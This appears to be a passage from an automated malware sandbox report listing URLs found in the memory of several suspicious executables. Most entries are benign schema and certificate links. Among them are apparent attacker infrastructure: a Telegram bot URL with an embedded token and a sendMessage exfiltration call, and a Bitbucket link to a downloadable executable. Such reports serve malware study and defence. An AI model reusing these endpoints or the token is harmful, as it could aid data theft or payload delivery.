                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700001000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                    Source: 7620ab885d.exe, 00000009.00000002.2487887465.00000000057C1000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367077966.00000000057CE000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2366887559.00000000057C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3ResponseD
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: DJj.exe, 00000010.00000002.2492014049.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: 7620ab885d.exe, 00000009.00000003.2122506118.000000000584D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2191299063.0000000005B12000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2637715133.0000000005576000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2765685995.00000000059F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: 7620ab885d.exe, 00000009.00000003.2062883778.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2062961074.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063068124.0000000005779000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140842949.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140548907.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2140671817.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577549714.000000000550C000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578311397.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2577978340.0000000005509000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702511803.000000000597B000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 68f6adf5d5.exe, 00000018.00000003.2434961195.0000017A8A9FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.googl
                    Source: 68f6adf5d5.exe, 00000019.00000003.2467666649.0000020F23CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                    Source: 68f6adf5d5.exe, 00000019.00000003.2467666649.0000020F23CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345313190.00007FF6BA261000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, 0a7e8af92e.exe, 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, DJj.exe, 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, DJj.exe, 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://api.ip.sb/ip
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                    Source: 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
                    Source: 68f6adf5d5.exe, 00000018.00000002.2602154875.0000017A8C7E0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0oQn
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://api.telegram.org/botFailed
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/dWPv7(
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/z
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                    Source: 7620ab885d.exeString found in binary or memory: https://bbc-frontbucket-exp.prod-east.f
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                    Source: 7620ab885d.exeString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                    Source: 7620ab885d.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.pro
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                    Source: 7620ab885d.exe, 00000009.00000003.2367077966.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2488024648.00000000057D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.netP
                    Source: 7620ab885d.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.publi
                    Source: 7620ab885d.exeString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367220698.0000000000C15000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                    Source: 7620ab885d.exe, 00000009.00000002.2465242779.000000000098A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
                    Source: 7620ab885d.exe, 00000009.00000002.2467266806.0000000000B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeYBj
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
